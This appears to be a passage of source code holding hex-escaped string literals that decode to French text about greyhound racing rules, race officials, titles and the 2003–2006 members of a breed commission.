+"\x65\x6e\x20\x6d\x61\x6c\x20\x65\x6e\x74\x72\x61\xee\x6e\xe9\x20"
+"\x6e\x65\x20\x70\x65\x75\x74\x20\x70\x61\x73\x2e\x20\x4d\x61\x69"
+"\x73\x20\x63\x27\x65\x73\x74\x20\x61\x75\x73\x73\x69\x20\x61\x66"
+"\x66\x61\x69\x72\x65\x20\x64\x27\x69\x6e\x64\x69\x76\x69\x64\x75"
+"\x2c\x20\x61\x76\x65\x63\x20\x20\x64\x65\x20\x76\x69\x76\x65\x73"
+"\x20\x63\x6f\x6e\x74\x72\x6f\x76\x65\x72\x73\x65\x73\x2e\x0d\x0d"
+"\x51\x75\x65\x6c\x71\x75\x65\x73\x20\x72\x65\x6e\x73\x65\x69\x67"
+"\x6e\x65\x6d\x65\x6e\x74\x73\x20\x69\x6e\x74\xe9\x72\x65\x73\x73"
+"\x61\x6e\x74\x73\x20\x3a\x0d\x0d\x09\x43\x6c\x75\x62\x73\x20\x20"
+"\x61\x67\x72\xe9\xe9\x73\x20\x3a\x0d\x41\x73\x73\x6f\x63\x69\x61"
+"\x74\x69\x6f\x6e\x20\x31\x39\x30\x31\x20\x61\x67\x72\xe9\xe9\x65"
+"\x20\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69"
+"\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x65\x6e\x20\x61"
+"\x63\x63\x6f\x72\x64\x20\x61\x76\x65\x63\x20\x6c\x61\x20\x53\x6f"
+"\x63\x69\xe9\x74\xe9\x20\x43\x61\x6e\x69\x6e\x65\x20\x6c\x6f\x63"
+"\x61\x6c\x65\x2e\x20\x49\x6c\x20\x6e\x65\x20\x70\x65\x75\x74\x20"
+"\x79\x20\x65\x6e\x20\x61\x76\x6f\x69\x72\x20\x71\x75\x27\x75\x6e"
+"\x20\x73\x65\x75\x6c\x20\x70\x61\x72\x20\x72\x61\x79\x6f\x6e\x20"
+"\x64\x65\x20\x37\x35\x4b\x6d\x20\x73\x69\x20\x6c\x61\x20\x70\x69"
+"\x73\x74\x65\x20\x65\x73\x74\x20\x72\xe9\x73\x65\x72\x76\xe9\x65"
+"\x20\x61\x75\x78\x20\xe9\x70\x72\x65\x75\x76\x65\x73\x20\x73\x70"
+"\x6f\x72\x74\x69\x76\x65\x73\x2c\x20\x64\x65\x20\x35\x30\x4b\x6d"
+"\x20\x73\x69\x20\x65\x6c\x6c\x65\x20\x65\x73\x74\x20\x70\x61\x72"
+"\x74\x61\x67\xe9\x65\x20\x61\x76\x65\x63\x20\x75\x6e\x65\x20\x53"
+"\x6f\x63\x69\xe9\x74\xe9\x20\xe0\x20\x50\x61\x72\x69\x20\x4d\x75"
+"\x74\x75\x65\x6c\x2e\x0d\x49\x6c\x20\x65\x73\x74\x20\x70\x61\x72"
+"\x66\x61\x69\x74\x65\x6d\x65\x6e\x74\x20\x61\x75\x74\x6f\x72\x69"
+"\x73\xe9\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x64\x65\x20"
+"\x64\x69\x73\x70\x75\x74\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72"
+"\x65\x75\x76\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x46\xe9\x64\xe9"
+"\x72\x61\x74\x69\x6f\x6e\x20\x64\x65\x73\x20\x53\x6f\x63\x69\xe9"
+"\x74\xe9\x73\x20\x64\x65\x20\x43\x6f\x75\x72\x73\x65\x73\x20\x28"
+"\x63\x6f\x75\x72\x73\x65\x73\x20\x61\x76\x65\x63\x20\x70\x61\x72"
+"\x69\x20\x6d\x75\x74\x75\x65\x6c\x29\x20\x20\x71\x75\x69\x20\x61"
+"\x20\x73\x6f\x6e\x20\x70\x72\x6f\x70\x72\x65\x20\x72\xe8\x67\x6c"
+"\x65\x6d\x65\x6e\x74\x20\x28\x63\x6f\x64\x65\x20\x64\x65\x73\x20"
+"\x63\x6f\x75\x72\x73\x65\x73\x29\x20\x65\x74\x20\x73\x65\x73\x20"
+"\x70\x72\x6f\x70\x72\x65\x73\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74"
+"\x73\x20\x28\x6c\x69\x76\x72\x65\x74\x73\x29\x2e\x0d\x0d\x09\x43"
+"\x79\x6e\x6f\x64\x72\x6f\x6d\x65\x73\x20\x3a\x0d\x50\x69\x73\x74"
+"\x65\x73\x20\x61\x67\x72\xe9\xe9\x65\x73\x2c\x20\x64\x6f\x6e\x74"
+"\x20\x6c\x65\x73\x20\x63\x6f\x74\x65\x73\x20\x6f\x6e\x74\x20\xe9"
+"\x74\xe9\x20\x6d\x65\x73\x75\x72\xe9\x65\x73\x20\x70\x61\x72\x20"
+"\x75\x6e\x20\x65\x78\x70\x65\x72\x74\x20\x61\x67\x72\xe9\xe9\x2c"
+"\x20\x61\x76\x65\x63\x20\x75\x6e\x20\x72\x61\x79\x6f\x6e\x20\x6d"
+"\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x34\x30\x6d\x2e\x0d\x49"
+"\x6c\x73\x20\x70\x65\x75\x76\x65\x6e\x74\x20\x61\x76\x6f\x69\x72"
+"\x20\x75\x6e\x65\x20\x70\x69\x73\x74\x65\x20\x65\x6e\x20\x68\x65"
+"\x72\x62\x65\x2c\x20\x65\x6e\x20\x73\x61\x62\x6c\x65\x2c\x20\x65"
+"\x6e\x20\x67\x61\x7a\x6f\x6e\x20\x73\x75\x72\x20\x73\x61\x62\x6c"
+"\x65\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x73\x6f\x6c\x20\x61\x20"
+"\x73\x65\x73\x20\x64\xe9\x66\x65\x6e\x73\x65\x75\x72\x73\x20\x65"
+"\x74\x20\x73\x65\x73\x20\x64\xe9\x74\x72\x61\x63\x74\x65\x75\x72"
+"\x73\x2e\x0d\x0d\x09\x4c\x65\x75\x72\x72\x65\x20\x3a\x0d\x4c\x65"
+"\x20\x6c\x65\x75\x72\x72\x65\x20\x65\x73\x74\x20\x63\x6f\x6e\x73"
+"\x74\x69\x74\x75\xe9\x20\x64\x65\x20\x72\x75\x62\x61\x6e\x73\x20"
+"\x15\x6c\x61\x73\x74\x69\x71\x75\x65\x20\x70\x6f\x75\x72\x20\x6c"
+"\x65\x73\x20\x45\x4e\x43\x2c\x20\x64\x65\x20\x70\x65\x61\x75\x20"
+"\x64\x65\x20\x6c\x61\x70\x69\x6e\x20\x70\x6f\x75\x72\x20\x6c\x61"
+"\x20\x50\x56\x4c\x2e\x20\x49\x6c\x20\x65\x73\x74\x20\x6d\xfb\x20"
+"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x63\xe2\x62\x6c"
+"\x65\x20\x65\x6e\x72\x6f\x75\x6c\xe9\x20\x73\x75\x72\x20\x75\x6e"
+"\x65\x20\x62\x6f\x62\x69\x6e\x65\x20\x28\x6c\x65\x75\x72\x72\x65"
+"\x20\x66\x69\x63\x65\x6c\x6c\x65\x29\x20\x61\x76\x65\x63\x20\x70"
+"\x6f\x75\x6c\x69\x65\x73\x20\x64\x65\x20\x72\x65\x6e\x76\x6f\x69"
+"\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x75\x6e\x20\x73\x79"
+"\x73\x74\xe8\x6d\x65\x20\x61\x75\x74\x6f\x70\x72\x6f\x70\x75\x6c"
+"\x73\xe9\x20\x67\x75\x69\x64\xe9\x20\x70\x61\x72\x20\x75\x6e\x20"
+"\x72\x61\x69\x6c\x2e\x0d\x0d\x09\x44\x69\x73\x74\x61\x6e\x63\x65"
+"\x73\x20\x3a\x0d\x4c\x65\x73\x20\x64\x69\x73\x74\x61\x6e\x63\x65"
+"\x73\x20\x66\x72\x61\x6e\xe7\x61\x69\x73\x65\x73\x20\x73\x6f\x6e"
+"\x74\x20\x64\x27\x65\x6e\x76\x69\x72\x6f\x6e\x20\x34\x38\x30\x6d"
+"\x20\x6f\x75\x20\x32\x35\x30\x6d\x20\x64\x65\x20\x66\x61\xe7\x6f"
+"\x6e\x20\xe0\x20\x61\x76\x6f\x69\x72\x20\x64\x65\x73\x20\x64\xe9"
+"\x70\x61\x72\x74\x73\x20\x65\x6e\x20\x6c\x69\x67\x6e\x65\x20\x64"
+"\x72\x6f\x69\x74\x65\x20\x71\x75\x69\x20\x6c\x69\x6d\x69\x74\x65"
+"\x6e\x74\x20\x62\x6c\x65\x73\x73\x75\x72\x65\x73\x20\x65\x74\x20"
+"\x62\x6f\x75\x73\x63\x75\x6c\x61\x64\x65\x73\x2e\x20\x4c\x65\x73"
+"\x20\x64\x69\x73\x74\x61\x6e\x63\x65\x73\x20\x69\x6e\x74\x65\x72"
+"\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x73\x20\x70\x6f\x75\x72\x20"
+"\x6c\x65\x73\x20\x77\x68\x69\x70\x70\x65\x74\x73\x20\x73\x6f\x6e"
+"\x74\x20\x70\x6f\x75\x72\x20\x6c\x65\x20\x6d\x6f\x6d\x65\x6e\x74"
+"\x20\x64\x65\x20\x33\x35\x30\x6d\x20\x63\x65\x20\x71\x75\x69\x20"
+"\x69\x6d\x70\x6f\x73\x65\x20\x75\x6e\x65\x20\x63\x6f\x75\x72\x74"
+"\x65\x20\x6c\x69\x67\x6e\x65\x20\x64\x72\x6f\x69\x74\x65\x20\x28"
+"\x34\x30\x2d\x35\x30\x6d\x29\x20\x61\x76\x65\x63\x20\x62\x69\x65"
+"\x6e\x20\x64\x65\x73\x20\x61\x6c\xe9\x61\x73\x20\x61\x75\x20\x74"
+"\x6f\x75\x72\x6e\x61\x6e\x74\x2e\x20\x4d\x61\x69\x73\x20\x63\x65"
+"\x6c\x61\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x68\x61\x6e"
+"\x67\x65\x72\x20\x64\x61\x6e\x73\x20\x6c\x65\x73\x20\x61\x6e\x6e"
+"\xe9\x65\x73\x20\xe0\x20\x76\x65\x6e\x69\x72\x2e\x0d\x0d\x09\x54"
+"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x3a\x0d\x49"
+"\x6c\x20\x65\x73\x74\x20\x63\x61\x6c\x63\x75\x6c\xe9\x20\x61\x6e"
+"\x6e\x75\x65\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20"
+"\x63\x68\x61\x71\x75\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x72\x61"
+"\x63\x65\x2c\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c\x20\x64"
+"\x65\x20\x66\x61\xe7\x6f\x6e\x20\xe0\x20\x75\x6e\x69\x66\x6f\x72"
+"\x6d\x69\x73\x65\x72\x20\x6c\x65\x73\x20\x72\xe9\x73\x75\x6c\x74"
+"\x61\x74\x73\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x63\x61\x74\xe9"
+"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
+"\x20\x63\x6f\x72\x72\x65\x73\x70\x6f\x6e\x64\x20\xe0\x20\x31\x2c"
+"\x20\x32\x2c\x20\x33\x2c\x20\x34\x20\x73\x65\x63\x6f\x6e\x64\x65"
+"\x73\x20\x70\x61\x72\x20\x72\x61\x70\x70\x6f\x72\x74\x20\x61\x75"
+"\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x2e\x20"
+"\x54\x6f\x75\x73\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72"
+"\x73\x20\x41\x20\x64\x6f\x69\x76\x65\x6e\x74\x20\x70\x6f\x75\x76"
+"\x6f\x69\x72\x20\x66\x69\x67\x75\x72\x18\x72\x20\x68\x6f\x6e\x6f"
+"\x72\x61\x62\x6c\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x6e\x69\x76"
+"\x65\x61\x75\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61"
+"\x6c\x20\x73\x61\x6e\x73\x20\x70\x72\xe9\x74\x65\x6e\x64\x72\x65"
+"\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x70\x6f"
+"\x64\x69\x75\x6d\x2e\x0d\x0d\x09\x43\x68\x65\x66\x20\x64\x65\x20"
+"\x70\x69\x73\x74\x65\x20\x3a\x0d\x43\x27\x65\x73\x74\x20\x6c\x65"
+"\x20\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x74\x65\x63"
+"\x68\x6e\x69\x71\x75\x65\x20\x64\x65\x20\x6c\x61\x20\x6a\x6f\x75"
+"\x72\x6e\xe9\x65\x20\x65\x74\x20\x6c\x61\x20\x73\x65\x75\x6c\x65"
+"\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x20\x68\x61\x62\x69\x6c\x69"
+"\x74\xe9\x65\x20\xe0\x20\x72\x65\x63\x65\x76\x6f\x69\x72\x20\x76"
+"\x6f\x73\x20\x64\x6f\x6c\xe9\x61\x6e\x63\x65\x73\x20\x6f\x75\x20"
+"\x72\xe9\x63\x6c\x61\x6d\x61\x74\x69\x6f\x6e\x73\x2e\x20\x49\x6c"
+"\x20\x6c\x65\x73\x20\xe9\x63\x61\x72\x74\x65\x20\x6f\x75\x20\x6c"
+"\x65\x73\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x20\x61\x75\x20\x6a"
+"\x75\x67\x65\x20\x71\x75\x35\x20\x61\x20\x73\x65\x75\x6c\x20\x70"
+"\x6f\x75\x76\x6f\x69\x72\x20\x64\x65\x20\x64\xe9\x63\x69\x73\x69"
+"\x6f\x6e\x2e\x0d\x0d\x09\x4a\x75\x67\x65\x20\x3a\x0d\x4c\x65\x20"
+"\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x75\x6e\x20\x65\x78\x70\x65"
+"\x72\x74\x20\x71\x75\x69\x20\x61\x20\x70\x61\x73\x73\xe9\x20\x75"
+"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x64\x65\x76\x61\x6e\x74\x20"
+"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9"
+"\x76\x72\x69\x65\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20"
+"\x61\x75\x74\x72\x65\x20\x65\x6e\x20\x45\x63\x6f\x6c\x65\x20\x56"
+"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x61\x70\x72\xe8\x73"
+"\x20\x75\x6e\x20\x73\x74\x61\x67\x65\x20\x64\x65\x20\x33\x20\x6a"
+"\x6f\x75\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x61\x20\x65\x78\x65"
+"\x72\x63\xe9\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x27\x75\x6e\x20"
+"\x6a\x75\x67\x65\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x20\x28\x61"
+"\x73\x73\x65\x73\x73\x6f\x72\x61\x74\x29\x2c\x20\x70\x75\x69\x73"
+"\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\x6f\x70\x6f\x73\xe9\x20"
+"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f"
+"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\xe0\x20\x6c\x61\x20"
+"\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x64\x65\x73\x20\x4a"
+"\x75\x67\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x2e\x20"
+"\x49\x6c\x20\x70\x6f\x75\x72\x72\x61\x20\x61\x6c\x6f\x72\x73\x20"
+"\x6a\x75\x67\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72\x65\x75\x76"
+"\x65\x73\x20\x6f\x72\x64\x69\x6e\x61\x69\x72\x65\x73\x20\x61\x76"
+"\x61\x6e\x74\x20\x64\x27\xea\x74\x72\x65\x20\x71\x75\x61\x6c\x69"
+"\x66\x69\xe9\x2e\x20\x55\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73"
+"\x20\x6c\x6f\x6e\x67\x2c\x20\x63\x6f\x6d\x70\x6c\x65\x78\x65\x2c"
+"\x20\x70\xe9\x6e\x69\x62\x6c\x65\x20\x71\x75\x69\x20\x6d\xe9\x72"
+"\x69\x74\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6f\x75\x72\x74\x6f"
+"\x69\x73\x69\x65\x2e\x0d\x0d\x09\x45\x78\x70\x65\x72\x74\x20\x51"
+"\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x65\x75\x72\x20\x3a\x0d\x34"
+"\x20\x61\x75\x20\x6d\x61\x78\x69\x6d\x75\x6d\x20\x70\x61\x72\x20"
+"\x43\x6c\x75\x62\x2c\x20\x70\x6c\x75\x73\x20\x6c\x65\x73\x20\x6a"
+"\x75\x67\x65\x73\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x73\x2c\x20"
+"\x70\x72\x6f\x70\x6f\x73\xe9\x73\x20\x70\x61\x72\x20\x6c\x65\x20"
+"\x43\x6c\x75\x62\x2e\x20\x49\x6c\x20\x73\x75\x62\x69\x74\x20\x75"
+"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x74\x68\xe9\x6f\x72\x69\x71"
+"\x75\x65\x20\x65\x74\x20\x70\x72\x61\x74\x69\x71\x75\x65\x20\x64"
+"\x65\x76\x61\x6e\x74\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73"
+"\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x71\x75\x69"
+"\x20\x6c\x65\x20\x6e\x6f\x6d\x6d\x65\x2e\x20\x4c\x65\x20\x50\x72"
+"\xe9\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20"
+"\x6f\x75\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\xc9\x6e"
+"\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x65\x75\x76\x65\x6e"
+"\x74\x20\x6c\x65\x20\x72\x65\x6c\x65\x76\x65\x72\x20\x64\x65\x20"
+"\x73\x61\x20\x66\x6f\x6e\x63\x74\x69\x6f\x6e\x2c\x20\x71\x75\x69"
+"\x20\x65\x73\x74\x20\x64\xe9\x6c\x69\x63\x61\x74\x65\x20\x65\x74"
+"\x20\x6c\x6f\x75\x72\x64\x65\x2e\x0d\x0d\x09\x43\x6f\x6d\x6d\x69"
+"\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x3a"
+"\x0d\x0d\x45\x6c\x6c\x65\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64\x20"
+"\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65\x20\x64\x65\x20\x70"
+"\x65\x72\x73\x6f\x6e\x6e\x65\x73\x20\x6e\x6f\x6d\x6d\xe9\x65\x73"
+"\x20\x70\x6f\x75\x72\x20\x74\x72\x6f\x69\x73\x20\x61\x6e\x73\x20"
+"\x70\x61\x72\x20\x6c\x65\x20\x43\x6f\x6d\x69\x74\xe9\x20\x64\x65"
+"\x20\x6c\x61\x20\x53\x43\x43\x20\x70\x61\x72\x6d\x69\x20\x73\x65"
+"\x73\x20\x70\x72\x6f\x70\x72\x65\x73\x20\x6d\x65\x6d\x62\x72\x65"
+"\x73\x20\x65\x74\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70"
+"\x65\x72\x73\x6f\x6e\x6e\x61\x6c\x69\x74\xe9\x73\x20\x71\x75\x61"
+"\x6c\x69\x66\x69\xe9\x65\x73\x2e\x20\x4c\x61\x20\x43\x6f\x6d\x6d"
+"\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20"
+"\xe9\x6c\x69\x74\x20\xe0\x20\x73\x6f\x6e\x20\x74\x6f\x75\x72\x20"
+"\x65\x6e\x20\x73\x6f\x6e\x20\x73\x65\x69\x6e\x20\x64\x69\x76\x65"
+"\x72\x73\x65\x73\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x73\x2e\x20"
+"\x50\x6f\x75\x72\x20\x6c\x61\x20\x70\xe9\x72\x69\x6f\x64\x65\x20"
+"\x32\x30\x30\x33\x20\x2d\x20\x32\x30\x30\x36\x2c\x20\x20\x6e\x6f"
+"\x75\x73\x20\x61\x76\x6f\x6e\x73\x20\x61\x69\x6e\x73\x69\x20\x3a"
+"\x0d\x0d\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x3a\x0d\x2d"
+"\x20\x4d\x2e\x20\x48\x65\x72\x6d\x65\x6c\x2c\x20\x43\x6f\x6d\x69"
+"\x74\xe9\x20\x53\x43\x43\x2c\x20\x4a\x75\x67\x65\x2e\x0d\x0d\x20"
+"\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x3a\x0d\x2d\x20\x4d"
+"\x6c\x6c\x65\x20\x4d\x6f\x6e\x69\x6f\x74\x2c\x20\x4a\x75\x67\x65"
+"\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x50\x72\xe9"
+"\x73\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x43\x4c\x43\x2c\x20"
+"\x43\x6f\x6d\x69\x74\xe9\x20\x43\x46\x57\x2c\x20\x43\x6f\x6d\x69"
+"\x74\xe9\x20\x43\x46\x50\x4c\x49\x2e\x0d\x53\x65\x63\x72\xe9\x74"
+"\x64\x69\x72\x65\x20\x61\x64\x6a\x6f\x69\x6e\x74\x3a\x0d\x2d\x20"
+"\x4d\x2e\x20\x46\x61\x75\x72\x65\x2c\x20\x4a\x75\x67\x65\x0d\x0d"
+"\x20\x4d\x65\x6d\x62\x72\x65\x73\x20\x3a\x0d\x2d\x20\x4d\x2e\x41"
+"\x72\x74\x68\x75\x73\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74"
+"\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x0d\x2d\x20\x4d\x6d\x65"
+"\x20\x54\x75\x6d\x61\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74"
+"\x65\x20\x64\x75\x20\x43\x46\x50\x4c\x49\x2c\x20\x50\x72\xe9\x73"
+"\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x4e\x41\x4c\x4c\x85\x0d"
+"\x2d\x20\x4d\x2e\x20\x41\x69\x6e\x61\x72\x64\x69\x2c\x20\x4a\x75"
+"\x67\x65\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x4a"
+"\x75\x67\x65\x2c\x20\x20\x0d\x09\x43\x6f\x75\x72\x73\x65\x20\x49"
+"\x2e\x54\x2e\x20\x3a\x0d\x43\x6f\x75\x72\x73\x65\x20\x69\x6e\x74"
+"\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x0d\x09\x4c"
+"\x69\x63\x65\x6e\x63\x65\x20\x3a\x0d\x41\x6e\x63\x69\x65\x6e\x6e"
+"\x65\x20\x61\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x20\x64\x65"
+"\x20\x6c\x61\x20\x6c\x69\x63\x65\x6e\x63\x65\x20\x69\x6e\x74\x65"
+"\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x43\x6f\x72\x72"
+"\x65\x73\x70\x6f\x6e\x64\x20\x61\x75\x20\x6e\x6f\x8c\x76\x65\x61"
+"\x75\x20\x63\x61\x72\x6e\x65\x74\x20\x31\x39\x39\x30\x2e\x0d\x0d"
+"\x09\x42\x41\x43\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e\x74\x20"
+"\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63\x61\x70"
+"\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20"
+"\x65\x6e\x20\x72\x61\x63\x69\x6e\x67\x20\x65\x74\x20\x50\x56\x4c"
+"\x2e\x20\x41\x75\x74\x72\x65\x66\x6f\x69\x73\x20\x43\x41\x54\x2e"
+"\x0d\x0d\x09\x42\x50\x56\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e"
+"\x74\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63"
+"\x61\x70\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69"
+"\x72\x20\x65\x6e\x20\x50\x56\x4c\x2e\x20\x41\x75\x74\x72\x65\x66"
+"\x6f\x69\x73\x20\x43\x41\x54\x50\x2e\x0d\x0d\x09\x43\x41\x43\x54"
+"\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27"
+"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d"
+"\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61"
+"\x69\x6c\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x76"
+"\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x65\x20\x6c\x61\x20\x63"
+"\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x41\x2e\x0d\x0d\x09\x52\x43"
+"\x41\x43\x54\x20\x3a\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65"
+"\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70"
+"\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69"
+"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c"
+"\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63"
+"\x6f\x6e\x64\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f"
+"\x72\x69\x65\x20\x41\x2e\x20\x49\x6c\x20\x73\x65\x20\x74\x72\x61"
+"\x6e\x73\x66\x6f\x72\x6d\x65\x20\x65\x6e\x20\x43\x41\x43\x54\x20"
+"\x73\x69\x20\x6c\x65\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20"
+"\x65\x73\x74\x20\x75\x6e\x20\x63\x68\x61\x6d\x70\x69\x6f\x6e\x20"
+"\x68\x6f\x6d\x6f\x6c\x6f\x67\x75\xe9\x2e\x0d\x0d\x09\x43\x41\x43"
+"\x50\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64"
+"\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61"
+"\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x50\x6f\x75\x72"
+"\x73\x75\x69\x74\x65\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61"
+"\x75\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x27\x75\x6e"
+"\x65\x20\x45\x50\x56\x4c\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e"
+"\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70"
+"\x6f\x69\x6e\x74\x73\x2e\x0d\x0d\x09\x52\x43\x41\x43\x50\x20\x3a"
+"\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65\x20\x43\x65\x72\x74"
+"\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64"
+"\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74"
+"\x20\x64\x65\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x2e\x0d\x44"
+"\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63\x6f\x6e\x64"
+"\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e\x20\x6d\x69\x6e\x69\x6d"
+"\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70\x6f\x69\x6e\x74\x73\x2e"
+"\x0d\x0d\x09\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x3a\x0d\x4c"
+"\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9\x20\x41\x20"
+"\x61\x75\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe8\x74\x72\x65\x20\x6f"
+"\x75\x20\x61\x79\x61\x6e\x74\x20\x64\x65\x20\x33\x33\x20\xe0\x20"
+"\x32\x33\x20\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c"
+"\x61\x20\x50\x56\x4c\x2e\x0d\x0d\x09\x54\x72\xe8\x73\x20\x42\x6f"
+"\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73"
+"\x73\xe9\x20\x65\x6e\x20\x42\x20\x6f\x75\x20\x61\x79\x61\x6e\x74"
+"\x20\x64\x65\x20\x32\x32\x20\xe0\x20\x31\x38\x20\x70\x6f\x69\x6e"
+"\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x56\x4c\x2e\x0d"
+"\x0d\x09\x42\x6f\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20"
